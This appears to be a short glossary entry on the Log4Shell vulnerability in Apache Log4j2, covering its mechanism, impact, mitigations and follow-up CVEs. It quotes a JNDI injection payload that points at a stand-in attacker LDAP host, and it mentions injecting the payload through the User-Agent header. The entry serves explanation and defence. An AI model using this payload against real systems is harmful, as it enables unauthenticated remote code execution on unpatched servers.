Log4Shell (CVE-2021-44228)
Log4Shell is a critical RCE in Apache Log4j2's JNDI lookup feature — the most consequential vulnerability of 2021, exploited within hours of disclosure.
Definition
Log4Shell is the popular name for CVE-2021-44228, a remote code execution vulnerability in Apache Log4j2 disclosed in December 2021. The bug let an attacker include a JNDI lookup expression — `${jndi:ldap://attacker/Exploit}` — in any string that the application ultimately logged. Log4j parsed the expression, performed the JNDI lookup, fetched the attacker-hosted class from LDAP, and ran its static initialiser. The result was reliable unauthenticated RCE with a single HTTP request.
The blast radius was unprecedented. Log4j is bundled in essentially every Java application, including dozens of enterprise products whose vendors did not realise they shipped it. CISA added the CVE to KEV the same day. The exploit complexity was so low that `User-Agent: ${jndi:...}` payloads achieved RCE on huge portions of the internet within 24 hours.
How it works
Any string passed to a Log4j logging call — direct `logger.info(input)` or indirect via fields like `User-Agent` that frameworks log automatically — was scanned for `${...}` expressions. The JNDI lookup ran outbound to the attacker's LDAP server, which returned a Java class reference whose static initialiser executed arbitrary code at fetch time.
Impact
Pre-auth RCE on the affected JVM. Worldwide exploitation within hours of disclosure.
Mitigation
Upgrade to Log4j 2.17.1 or later. Earlier patches (2.15.x, 2.16.x) addressed the bug incompletely and several follow-up CVEs (CVE-2021-45046, CVE-2021-45105) reopened variants. `-Dlog4j2.formatMsgNoLookups=true` mitigates older 2.10+ deployments. Block outbound LDAP / RMI at the network edge as defence-in-depth.
Examples
- CVE-2021-44228 — the original Log4Shell.
- CVE-2021-45046 — Log4Shell variant exploiting the incomplete 2.15 fix.
- CVE-2021-45105 — DoS variant in Log4j 2.16.